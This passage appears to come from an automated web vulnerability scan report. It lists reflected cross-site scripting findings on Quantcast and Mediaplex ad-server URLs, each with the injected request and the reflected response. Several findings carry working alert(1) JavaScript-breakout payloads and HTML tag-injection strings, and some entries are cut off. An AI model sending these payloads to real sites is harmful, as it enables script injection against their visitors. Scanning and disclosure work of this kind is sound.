The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b0ba"><a>c993341852d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie6.css1b0ba"><a>c993341852d HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.5.8.1300624434708; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Sun, 20 Mar 2011 14:03:01 GMT
Content-Length: 17308
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie6.css1b0ba"><a>c993341852d" />
...[SNIP]...

1.56. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd13b"><a>45618fe4fb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /csscd13b"><a>45618fe4fb1/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.5.8.1300624434708; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 20 Mar 2011 14:02:59 GMT
Content-Length: 7317
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" csscd13b"><a>45618fe4fb1 ie7.css" />
...[SNIP]...

1.57. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8073b"><a>9c78d8cd46c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie7.css8073b"><a>9c78d8cd46c HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.5.8.1300624434708; __qca=P0-1138661367-1297862290557;

Response

1.58. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca0f"><a>7c5d5ce786c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-cssfca0f"><a>7c5d5ce786c/screen-optimized.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.5.8.1300624434708; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 20 Mar 2011 14:02:58 GMT
Content-Length: 7338
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-cssfca0f"><a>7c5d5ce786c screen-optimized.css" />
...[SNIP]...

1.59. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e096"><a>de0cdf7d8a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.css9e096"><a>de0cdf7d8a3 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.5.8.1300624434708; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 20 Mar 2011 14:03:05 GMT
Content-Length: 7338
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css screen-optimized.css9e096"><a>de0cdf7d8a3" />
...[SNIP]...

1.60. http://ak.quantcast.com/js/concat.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f436a"><a>21658d1fbd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jsf436a"><a>21658d1fbd2/concat.js HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.5.8.1300624434708; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 20 Mar 2011 14:02:59 GMT
Content-Length: 7318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" jsf436a"><a>21658d1fbd2 concat.js" />
...[SNIP]...

1.61. http://ak.quantcast.com/js/concat.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/js/concat.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b07d"><a>ae5a35e8e5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/concat.js9b07d"><a>ae5a35e8e5d HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.5.8.1300624434708; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 20 Mar 2011 14:03:03 GMT
Content-Length: 15160
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js concat.js9b07d"><a>ae5a35e8e5d" />
...[SNIP]...

1.62. http://altfarm.mediaplex.com/ad/js/10433-118675-1629-11 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/10433-118675-1629-11

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afc08'-alert(1)-'1845c31eef was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/10433-118675-1629-11?mpt=1540631604afc08'-alert(1)-'1845c31eef&mpvc=http://r1-ads.ace.advertising.com/click/site=0000787694/mnum=0000985691/cstr=69689444=_4d85f5b3,1540631604,787694^985691^1183^0,1_/xsxdata=$XSXDATA/bnum=69689444/optn=64?trg= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10433:1629/1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534; expires=Wed, 20-Mar-2013 5:07:14 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 420
Date: Sun, 20 Mar 2011 13:08:36 GMT

document.write('<a target="_blank" href="http://r1-ads.ace.advertising.com/click/site=0000787694/mnum=0000985691/cstr=69689444=_4d85f5b3,1540631604,787694^985691^1183^0,1_/xsxdata=$XSXDATA/bnum=69689444/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/10433-118675-1629-11?mpt=1540631604afc08'-alert(1)-'1845c31eef">
...[SNIP]...

1.63. http://altfarm.mediaplex.com/ad/js/10433-118675-1629-11 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/10433-118675-1629-11

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53b13'%3balert(1)//e8b08108261 was submitted in the mpvc parameter. This input was echoed as 53b13';alert(1)//e8b08108261 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/10433-118675-1629-11?mpt=1540631604&mpvc=http://r1-ads.ace.advertising.com/click/site=0000787694/mnum=0000985691/cstr=69689444=_4d85f5b3,1540631604,787694^985691^1183^0,1_/xsxdata=$XSXDATA/bnum=69689444/optn=64?trg=53b13'%3balert(1)//e8b08108261 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10433:1629/1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534; expires=Wed, 20-Mar-2013 4:18:56 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 433
Date: Sun, 20 Mar 2011 13:09:18 GMT

document.write('<a target="_blank" href="http://r1-ads.ace.advertising.com/click/site=0000787694/mnum=0000985691/cstr=69689444=_4d85f5b3,1540631604,787694^985691^1183^0,1_/xsxdata=$XSXDATA/bnum=69689444/optn=64?trg=53b13';alert(1)//e8b08108261http://altfarm.mediaplex.com/ad/ck/10433-118675-1629-11?mpt=1540631604">
...[SNIP]...

1.64. http://altfarm.mediaplex.com/ad/js/10433-118675-1629-11 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/10433-118675-1629-11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9931f'%3balert(1)//901684e694a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9931f';alert(1)//901684e694a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/10433-118675-1629-11?mpt=1540631604&mpvc=http://r1-ads.ace.advertising.com/click/site=0000787694/mnum=0000985691/cstr=69689444=_4d85f5b3,1540631604,787694^985691^1183^0,1_/xsxdata=$XSXDATA/bnum=69689444/optn=64?trg=&9931f'%3balert(1)//901684e694a=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10433:1629/1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534; expires=Wed, 20-Mar-2013 4:44:04 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 436
Date: Sun, 20 Mar 2011 13:10:33 GMT

document.write('<a target="_blank" href="http://r1-ads.ace.advertising.com/click/site=0000787694/mnum=0000985691/cstr=69689444=_4d85f5b3,1540631604,787694^985691^1183^0,1_/xsxdata=$XSXDATA/bnum=69689444/optn=64?trg=&9931f';alert(1)//901684e694a=1http://altfarm.mediaplex.com/ad/ck/10433-118675-1629-11?mpt=1540631604">
...[SNIP]...

1.65. http://altfarm.mediaplex.com/ad/js/1551-47634-23636-1 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/1551-47634-23636-1

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1df4d'-alert(1)-'2305123228a was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/1551-47634-23636-1?mpt=39527881df4d'-alert(1)-'2305123228a&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/17/177/%2a/n%3B237863701%3B0-0%3B1%3B40342997%3B4307-300/250%3B41068870/41086657/1%3Bu%3Drmxli_2904721|surl_http%3A//buzzya.com/category/sports/|pr_0.3563|pid_298720%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3B6db7f3ad8100ff53%3B12ed360bbcb,0%3B%3B%3B2273949687,KnKABBt0GAD2lIQAAAAAAMnCIQAAAAAAAgAAAAIAAAAAAP8AAAABCXmeHQAAAAAAhIAMAAAAAACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAyrtg0y4BAAAAAAAAADA1YjY2ZTYyLTUyZjMtMTFlMC1iYTA0LTAwMzA0OGQ2ZDA2NgA4nyoAAAA=,,http%3A%2F%2Fbuzzya.com%2Fcategory%2Fsports%2F, HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?KnKABBt0GAD2lIQAAAAAAMnCIQAAAAAAAgAAAAIAAAAAAP8AAAABCXmeHQAAAAAAhIAMAAAAAACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAUW9GzVfJwT.2KFyPwvXYPwb6RJ4kXcs.MzMzMzMz4z-wJeSDns3WPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwVkO2l-DOCTGCXHbDfz0sufUj6vM0J-hwZAb8AAAAAA==,,http%3A%2F%2Fbuzzya.com%2Fcategory%2Fsports%2F,Z%3D300x250%26s%3D1602587%26_salt%3D796290819%26B%3D10%26u%3Dhttp%253A%252F%252Fbuzzya.com%252Fcategory%252Fsports%252F%26r%3D0,05b66e62-52f3-11e0-ba04-003048d6d066
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 776
Date: Sun, 20 Mar 2011 13:30:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/17/177/*/n;237863701;0-0;1;40342997;4307-300/250;41068870/41086657/1;u=rmxli_2904721|surl_http://buzzya.com/category/
...[SNIP]...
ADH0QoAAAAAAAIAAwAAAAAAyrtg0y4BAAAAAAAAADA1YjY2ZTYyLTUyZjMtMTFlMC1iYTA0LTAwMzA0OGQ2ZDA2NgA4nyoAAAA=,,http://buzzya.com/category/sports/,http://altfarm.mediaplex.com/ad/ck/1551-47634-23636-1?mpt=39527881df4d'-alert(1)-'2305123228a">
...[SNIP]...

1.66. http://altfarm.mediaplex.com/ad/js/1551-47634-23636-1 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/1551-47634-23636-1

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ca03'%3balert(1)//6eeff463a18 was submitted in the mpvc parameter. This input was echoed as 1ca03';alert(1)//6eeff463a18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/1551-47634-23636-1?mpt=3952788&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/17/177/%2a/n%3B237863701%3B0-0%3B1%3B40342997%3B4307-300/250%3B41068870/41086657/1%3Bu%3Drmxli_2904721|surl_http%3A//buzzya.com/category/sports/|pr_0.3563|pid_298720%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3B6db7f3ad8100ff53%3B12ed360bbcb,0%3B%3B%3B2273949687,KnKABBt0GAD2lIQAAAAAAMnCIQAAAAAAAgAAAAIAAAAAAP8AAAABCXmeHQAAAAAAhIAMAAAAAACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAyrtg0y4BAAAAAAAAADA1YjY2ZTYyLTUyZjMtMTFlMC1iYTA0LTAwMzA0OGQ2ZDA2NgA4nyoAAAA=,,http%3A%2F%2Fbuzzya.com%2Fcategory%2Fsports%2F,1ca03'%3balert(1)//6eeff463a18 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?KnKABBt0GAD2lIQAAAAAAMnCIQAAAAAAAgAAAAIAAAAAAP8AAAABCXmeHQAAAAAAhIAMAAAAAACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAUW9GzVfJwT.2KFyPwvXYPwb6RJ4kXcs.MzMzMzMz4z-wJeSDns3WPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwVkO2l-DOCTGCXHbDfz0sufUj6vM0J-hwZAb8AAAAAA==,,http%3A%2F%2Fbuzzya.com%2Fcategory%2Fsports%2F,Z%3D300x250%26s%3D1602587%26_salt%3D796290819%26B%3D10%26u%3Dhttp%253A%252F%252Fbuzzya.com%252Fcategory%252Fsports%252F%26r%3D0,05b66e62-52f3-11e0-ba04-003048d6d066
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 776
Date: Sun, 20 Mar 2011 13:30:53 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/17/177/*/n;237863701;0-0;1;40342997;4307-300/250;41068870/41086657/1;u=rmxli_2904721|surl_http://buzzya.com/category/
...[SNIP]...
AACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAyrtg0y4BAAAAAAAAADA1YjY2ZTYyLTUyZjMtMTFlMC1iYTA0LTAwMzA0OGQ2ZDA2NgA4nyoAAAA=,,http://buzzya.com/category/sports/,1ca03';alert(1)//6eeff463a18http://altfarm.mediaplex.com/ad/ck/1551-47634-23636-1?mpt=3952788">
...[SNIP]...

1.67. http://altfarm.mediaplex.com/ad/js/1551-47634-23636-1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/1551-47634-23636-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da7ef'%3balert(1)//63799f412da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da7ef';alert(1)//63799f412da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/1551-47634-23636-1?mpt=3952788&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/17/177/%2a/n%3B237863701%3B0-0%3B1%3B40342997%3B4307-300/250%3B41068870/41086657/1%3Bu%3Drmxli_2904721|surl_http%3A//buzzya.com/category/sports/|pr_0.3563|pid_298720%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3B6db7f3ad8100ff53%3B12ed360bbcb,0%3B%3B%3B2273949687,KnKABBt0GAD2lIQAAAAAAMnCIQAAAAAAAgAAAAIAAAAAAP8AAAABCXmeHQAAAAAAhIAMAAAAAACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAyrtg0y4BAAAAAAAAADA1YjY2ZTYyLTUyZjMtMTFlMC1iYTA0LTAwMzA0OGQ2ZDA2NgA4nyoAAAA=,,http%3A%2F%2Fbuzzya.com%2Fcategory%2Fsports%2F,&da7ef'%3balert(1)//63799f412da=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?KnKABBt0GAD2lIQAAAAAAMnCIQAAAAAAAgAAAAIAAAAAAP8AAAABCXmeHQAAAAAAhIAMAAAAAACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAUW9GzVfJwT.2KFyPwvXYPwb6RJ4kXcs.MzMzMzMz4z-wJeSDns3WPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwVkO2l-DOCTGCXHbDfz0sufUj6vM0J-hwZAb8AAAAAA==,,http%3A%2F%2Fbuzzya.com%2Fcategory%2Fsports%2F,Z%3D300x250%26s%3D1602587%26_salt%3D796290819%26B%3D10%26u%3Dhttp%253A%252F%252Fbuzzya.com%252Fcategory%252Fsports%252F%26r%3D0,05b66e62-52f3-11e0-ba04-003048d6d066
